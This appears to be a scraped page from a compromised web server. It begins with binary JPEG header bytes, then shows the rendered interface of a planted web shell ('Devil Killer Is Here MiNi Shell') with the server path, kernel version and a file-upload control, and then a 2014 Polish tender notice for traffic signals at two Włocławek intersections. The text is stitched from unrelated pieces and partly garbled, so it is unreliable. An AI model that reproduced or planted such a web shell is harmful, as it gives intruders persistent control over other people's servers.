JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140724/247704-N-2014.html

<p class="kh_header"><b>Włocławek: Budowa sygnalizacji świetlnej w systemie zaprojektuj wykonaj</b><br>
<b>Numer ogłoszenia: 247704 - 2014; data zamieszczenia: 24.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg , ul. Zielna 13/21, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4121323, faks 054 4121323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdwloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sygnalizacji świetlnej w systemie zaprojektuj wykonaj.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest zaprojektowanie i wykonanie sygnalizacji świetlnej - acyklicznej, na skrzyżowaniu ulic Barska - Polna oraz Barska - Wojskowa (zgodnie z załączoną mapką poglądową) oraz Programem Funkcjonalno - Użytkowym.
Zamówienie obejmuje:
-opracowanie dokumentacji projektowych,
-wykonanie robót zgodnie z opracowanymi, uzgodnionymi i zatwierdzonymi dokumentacjami projektowymi.
-Serwisowanie wykonanych sygnalizacji świetlnych przez okres 1 roku od odbioru końcowego.
Wykonanie robót należy rozpocząć od skrzyżowania Barska - Polna.

1.1. Zakres zamówienia:

W części projektowej:
1.	Przedmiotem opracowania należy objąć:
1.1.	Ulice Barską i Polną:
-w zakresie zaprojektowania sygnalizacji świetlnej na skrzyżowaniu ulic: Barska - Polna z dostosowaniem do istniejącej geometrii skrzyżowania i obecnej organizacji ruchu.
1.2.	Ulice Barską i Wojskową:
-w zakresie zaprojektowania sygnalizacji świetlnej na skrzyżowaniu ulic: Barska - Polna z dostosowaniem do istniejącej geometrii skrzyżowania i obecnej organizacji ruchu. 
      1.3.	projekty docelowej organizacji ruchu w zakresie sygnalizacji świetlnej oznakowania pionowego i poziomego wg informacji podanych w punkcie 1.2.2. i 1.3,
1.4.	projekty czasowej organizacji ruchu na czas prowadzenia robót.

2. 	Opracowaną dokumentację Wykonawca zobowiązany jest przedłożyć w MZD, celem uzgodnienia i zaakceptowania proponowanego rozwiązania.

3.	Zawartość opracowanej dokumentacji:

-Specyfikacje techniczne wykonania i odbioru robót,
-Projekt sygnalizacji świetlnych dla skrzyżowania ulic Barska - Polna,
-Projekt sygnalizacji świetlnej dla skrzyżowania ulic Barska - Wojskowa,
-Projekty docelowej organizacji ruchu w zakresie oznakowania pionowego 
i poziomego związane z budową sygnalizacji,
-Projekty czasowej zmiany w organizacji ruchu na czas prowadzenia robót.
-Informacje niezbędne do zgłoszenia robót,

Wszystkie elementy projektów muszą posiadać wymagane prawem uzgodnienia i mają być oznaczone odpowiednimi kodami CPV.

W części realizacji robót:
-wykonanie robót zgodnie z opracowaną, uzgodnioną, zatwierdzoną i zaakceptowaną przez Zamawiającego dokumentacją projektową, warunkami technicznymi wykonania i odbioru robót określonymi w PFU oraz zgodnie z obowiązującymi przepisami,
-przeprowadzanie wszelkich prób i badań oraz przygotowanie wszelkich dokumentów związanych z odbiorem obiektu, w tym geodezyjnej dokumentacji powykonawczej.

2.  Opis wymagań Zamawiającego w stosunku do przedmiotu zamówienia

Zamawiający wymaga, aby przedmiot zamówienia zrealizowano zgodnie z zaakceptowaną dokumentacją projektową oraz wiedzą budowlaną, polskimi normami oraz innymi obowiązującymi przepisami.

2.1	Wymagania ogólne:

2.1.1	Obowiązki Wykonawcy na etapie projektowania:

1.	Dokumentację projektową należy opracować zgodnie i w oparciu o obowiązujące akty prawne, normy, normatywy i wytyczne projektowe.
2.	Projekty, zarówno sygnalizacji, jak i organizacji ruchu, mają posiadać wymagane uzgodnienia urzędowe i branżowe, umożliwiające realizację zadania. 
3.	Wykonawca pozyska we własnym zakresie wszelkie niezbędne materiały potrzebne do opracowania projektów (z wyjątkiem tych, do których przekazania zobowiązany jest Zamawiający).
4.	Nie wolno na mapach w formie numerycznej dokonywać zmian. Rysunki branżowe należy wykonać w oddzielnych plikach. Przekazane na płycie rysunki, powinny być przygotowane do wydruku lub z opisem druku (szerokość i kolory linii). Rysunki należy przekazać w plikach w państwowym układzie współrzędnych (2000) - zapisany w plikach *dwg lub *dxf, bądź w rozwarstwieniu pod (Ewmapę). Pliki tekstowe w programie MS Office - Word lub kompatybilnym (format *.doc), programy sygnalizacji w formacie *.xls.
5.	Przed przystąpieniem do projektowania Projektant dokona wizji w terenie.
6.	Dokumentację projektową Wykonawca zobowiązany jest uzgadniać (na roboczo).
z MZD we Włocławku, zgodnie z harmonogramem rzeczowo-finansowym. 
7.	Wykonawca zobowiązany jest uzyskać akceptację geometrii, zajętości terenu oraz zastosowanych rozwiązań i technologii przed każdym kolejnym etapem projektowania.
8.	Na etapie projektowania Wykonawca zobowiązany jest do składania bieżącej informacji o postępie prac projektowych, prezentacji zastosowanych rozwiązań i technologii, a także informowania o uzyskanych warunkach i dokonanych uzgodnieniach.
9.	Rozwiązania przyjęte dla ruchu pieszego oraz zastosowane urządzenia muszą odpowiadać wymogom ruchu osób niepełnosprawnych.
10.	Wszystkie elementy dokumentacji należy przekazać Zamawiającemu w zamykanych teczkach z opisem zawartości każdej teczki. Dokumentację projektową dla skrzyżowań należy przekazać w formie papierowej (3 kpl.) i elektronicznej na karcie pamięci micro-sd (1szt.). 
11.	Przekazanie i odbiór dokumentacji odbędzie się na podstawie protokołu zdawczo - odbiorczego i oświadczenia Projektanta o kompletności dokumentacji oraz o tym, że projekt został wykonany zgodnie z umową, obowiązującymi przepisami prawa oraz normami i jest kompletny z punktu widzenia celu, któremu ma służyć. Do dokumentacji należy także dołączyć oświadczenie Projektanta, że wszelkie zmiany i uwagi wniesione na etapie uzgodnień, zostały wprowadzone do projektów.


2.1.2	Obowiązki Wykonawcy na etapie realizacji robót:

1.	Roboty będą realizowane w oparciu o opracowaną, uzgodnioną dokumentację projektową, specyfikacje techniczne wykonania i odbioru robót oraz zgodnie z obowiązującymi przepisami.
2.	Wykonawca zrealizuje przedmiot zamówienia kompleksowo, koordynując wszelkie działania związane z jego wykonaniem.
3.	Wykonawca odpowiada za jakość wykonanych robót, bezpieczeństwo wszystkich czynności prowadzonych na terenie budowy, metody zastosowane podczas budowy oraz za ich zgodność z dokumentacja projektową, specyfikacjami technicznymi i poleceniami Zamawiającego.
4.	Wykonawca będzie prowadził roboty zgodnie z opracowanym harmonogramem rzeczowo - finansowym.
5.	Roboty wykonywane będą z materiałów Wykonawcy, dopuszczonych do obrotu i stosowania w budownictwie. Wszystkie materiały użyte do wykonywania robót budowlano - montażowych muszą posiadać wymagane prawem aprobaty techniczne i atesty. Wykonawca dostarczy Zamawiającemu dane techniczno - ruchowe sterownika przeznaczonego do zamontowania na skrzyżowaniu. Dane te muszą potwierdzać przydatność urządzenia zgodnie z punktem 1.3 niniejszego załącznika.
6.	Wykonawca zapewni możliwość wykonywania robót w systemie wielozmianowym oraz - w przypadku wystąpienia takiej potrzeby i na wniosek Zamawiającego - 
w dniach wolnych od pracy.
7.	Wykonawca wykona we własnym zakresie, przed przystąpieniem do robót, inwentaryzację (w tym fotograficzną) przyległych terenów, dotyczących ewentualnych uszkodzeń, spowodowanych prowadzonymi robotami, a po zakończeniu robót przekaże inwentaryzację Zamawiającemu. Powstałe w trakcie robót szkody, usunie we własnym zakresie i na własny koszt.
8.	Wykonawca zabezpieczy interesy osób trzecich oraz użytkowników i właścicieli przyległej zabudowy, naruszone w związku z realizacją zadania, a w tym:
-funkcjonowanie lokali użytkowych, punktów handlowych i usługowych oraz instytucji poprzez odpowiednią organizację robót, tymczasowe dojścia, dojazdy itp.,
-zabezpieczenie ciągłości dostaw mediów wraz z wcześniejszym powiadomieniem zainteresowanych o mającej nastąpić przerwie w ich dostawie w przypadku konieczności dokonania okresowych wyłączeń,
-wykona wszelkie inne roboty i usunie ewentualne szkody, będące skutkiem prowadzonej budowy.
9.	Wykonawca zabezpieczy znaki geodezyjne przed uszkodzeniem, a w przypadku zniszczenia lub uszkodzenia, odtworzy je na własny koszt.
10.	Wykonawca we własnym zakresie i na własny koszt:
-zapewni objęcie kierownictwa robót przez kierownika robót,
-opracuje niezbędne rozwiązania wykonawcze,
-powiadomi właścicieli infrastruktury technicznej zlokalizowanej w obszarze objętym opracowaniem i w granicach pasa drogowego o prowadzonych robotach i w razie konieczności spowodowanej kolizją, wezwie nadzór specjalistyczny oraz pokryje koszty tego nadzoru,
-zabezpieczy nieprzewidziane w projekcie skrzyżowania i zbliżenia z istniejącym uzbrojeniem - zgodnie z wymogami administratora kolidującego uzbrojenia,
-Wykonawca ponosi koszty zużycia wody, energii elektrycznej (w tym montaż odpowiednich liczników) na terenie budowy i zabezpieczy dostawy energii elektrycznej i wody dla potrzeb zaplecza budowy i procesów technologicznych na terenie robót. Wykonawca we własnym zakresie ustali punkty poboru tymczasowego mediów z ich administratorami,
-Wykonawca (jeśli to konieczne) wykona, a po zakończeniu robót zdemontuje zaplecze budowy jak również będzie ponosił koszty utrzymania oraz konserwacji wszelkich urządzeń i obiektów tymczasowych, dróg dojazdowych i montażowych, na zorganizowanym przez siebie placu budowy,
-Wykonawca zobowiązuje się wykonać i utrzymać na swój koszt zabezpieczenie budowy, strzec mienia znajdującego się na terenie budowy a także zapewnić warunki bezpieczeństwa,
-utrzyma w należytej sprawności oznakowanie i zabezpieczenie placu budowy,
-Wykonawca przygotuje oraz przekaże Zamawiającemu dokumentację powykonawczą budowy (1 kpl) wraz z inwentaryzacją geodezyjną powykonawczą w 3 egzemplarzach w wersji papierowej oraz 1 egzemplarz w wersji elektronicznej na nośniku pamięci -karta microsd (rysunek przed oddaniem do zasobu - w układzie numerycznym, w państwowym układzie współrzędnych (2000) - zapisany w plikach *dwg lub *dxf, bądź w rozwarstwieniu pod (Ewmapę). W)w. dokumentacja powykonawcza stanowi załącznik do faktury. Płatność za wystawioną fakturę może nastąpić wyłącznie po akceptacji w/w dokumentacji. 
11.	Na żądanie Zamawiającego Wykonawca zapewni robociznę i sprzęt niezbędny do zbadania wskazanych przez Zamawiającego materiałów wbudowanych przez Wykonawcę. 
12.	Wykonawca jest zobowiązany do właściwego zabezpieczenia terenu budowy na czas realizacji przedmiotu zamówienia, aż do zakończenia i odbioru ostatecznego robót. Najpóźniej w dniu podpisania umowy wykonawca zobowiązany jest podać zamawiającemu dane osoby lub podmiotu odpowiedzialnego za całodobowe, bezkolizyjne funkcjonowanie i utrzymanie organizacji ruchu oraz numer telefonu komórkowego, pod którym dana osoba lub podmiot jest dostępny. Organizacja robót i ruchu powinna wprowadzać jak najmniej utrudnień w ruchu kołowym i pieszym.
13.	Wykonawca po przejęciu terenu zabezpieczy majątek miasta nie podlegający przebudowie (oznakowanie, zieleń, elementy architektury i infrastruktury technicznej) i po zakończeniu budowy doprowadzi powyższe do stanu jak przed rozpoczęciem robót.
14.	Wykonawca ponosi odpowiedzialność cywilną za szkody wyrządzone na osobach i rzeczach, od czasu przejęcia placu budowy do dnia odbioru końcowego przedmiotu zamówienia.
15.	Wykonawca zobowiązany jest do przedstawienia inspektorowi nadzoru wymaganych prawem wyników badań i pomiarów, zgodnych z obowiązującymi ustawami, normami i szczegółowymi specyfikacjami technicznymi dla poszczególnych rodzajów robót.
16.	Wykonawca zobowiązany jest do uzyskania akceptacji inspektora nadzoru dla materiałów przeznaczonych do wbudowania przed ich wbudowaniem, na podstawie przedstawionych atestów i świadectw jakości. W przypadku niedotrzymania tego warunku i niedopuszczenia materiału do użycia, dokona wymiany elementu lub materiału na własny koszt.
17.	Wykonawca ma obowiązek znać i w czasie prowadzenia robót stosować przepisy dotyczące ochrony środowiska naturalnego. Zobowiązany jest do podejmowania wszelkich uzasadnionych kroków, mających na celu stosowanie się do przepisów i norm dotyczących ochrony środowiska na terenie i wokół terenu budowy oraz unikania uszkodzeń lub uciążliwości dla osób lub dóbr publicznych i innych, a wynikających z nadmiernego hałasu, wibracji i zanieczyszczenia, lub innych przyczyn, powstałych w następstwie jego sposobu działania.
18.	Na Wykonawcy ciąży zgodne z obowiązującymi przepisami zagospodarowanie odpadów powstałych w trakcie prowadzonych przez niego robót oraz po ich zakończeniu. 

Okres rękojmi i gwarancji wynosi 24 miesiące od daty podpisania protokołu odbioru ostatecznego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.94-6, 71.32.25.00-6, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości 3 000zł. 
Wadium może być wniesione w:
-pieniądzu,
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Z roku 2007 Nr 42, poz.275, z późn, zm.)
Wpłatę wadium przetargowego w pieniądzu należy dokonać na konto Miejskiego  Zarządu  Dróg Bank  PKO BP S.A. I o/Włocławek Rachunek nr 61 1020 5170 0000 1102  0009 0407</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonać min. jedną robotę budowlaną polegającą na zaprojektowaniu i wybudowaniu sygnalizacji świetlnej na skrzyżowaniu o wartości min. 250.000 PLN (netto).
W celu oceny spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 i zweryfikowania zdolności wykonawcy do należytego wykonania udzielonego zamówienia w opisie jak powyżej, należy załączyć:
a) wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, zgodnie z treścią zał. nr 5 do siwz;
Przez najważniejsze roboty wraz z dowodami Zamawiający rozumie roboty, o których mowa wyżej.
Dowodami potwierdzającymi, czy roboty zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone są:
- poświadczenie
- lub inne dokumenty potwierdzające wykonanie robót budowlanych należycie oraz prawidłowo ukończone zgodnie z zasadami sztuki budowlanej, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia o których mowa powyżej.
1) W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa powyżej, budzą wątpliwości zamawiającego, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu.
2) W przypadku, gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać niezbędne do wykonania narzędzia i urządzenia - minimum wg Tabeli lub  przedstawić pisemne zobowiązanie innych podmiotów do ich udostępnienia.
1).	Żuraw samochodowy o udźwigu min. 4t	1,
2).	Wysięgnik koszowy	1,
3).	Samochód dostawczy	1,
4).	Maszyna umożliwiająca wykonanie przewiertu sterowanego	1,

Spełnienie tego warunku nie zwalnia wyłonionego Wykonawcy z obowiązku zapewnienia pozostałego sprzętu niezbędnego do prawidłowego i terminowego zrealizowania zadania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać się osobami oraz informacjami o podstawie do dysponowania tymi osobami, które będą uczestniczyć w wykonywaniu zamówienia odpowiedzialnych za kierowanie robotami budowlanymi (zgodnie z dyspozycją art. 12 ustawy - Prawo budowlane z dnia 07 lipca 1994r  (tekst jednolity Dz.U.2013r., poz. 1409 ze zm.):
a)	kierownik budowy powinien posiadać uprawnienia budowlane w specjalności sieci, instalacji i urządzeń elektrycznych i energetycznych, min. 2 lata doświadczenia w branży elektrycznej na stanowisku kierownika budowy lub kierownika robót.

W celu oceny spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 i zweryfikowania zdolności wykonawcy do należytego wykonania udzielonego zamówienia w opisie jak powyżej, należy załączyć:
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, zgodnie z treścią zał. nr 7 do siwz;
Spełnienie warunku o którym mowa wyżej nie zwalnia wyłonionego Wykonawcy z obowiązku zapewnienia innych osób niezbędnych do prawidłowej 
i terminowej realizacji zamówienia.
Zamawiający dopuszcza także możliwość potwierdzenia spełniania warunku dot. dysponowania odpowiednimi osobami poprzez wykazanie posiadania przez nie uprawnień równoważnych do wymaganych, wydanych na podstawie przepisów obowiązujących w państwach członkowskich i potwierdzonych stosowną decyzją w sprawie uznania kwalifikacji zawodowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty, jeżeli nie wynika ono z odrębnych dokumentów np. odpisu z rejestru</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
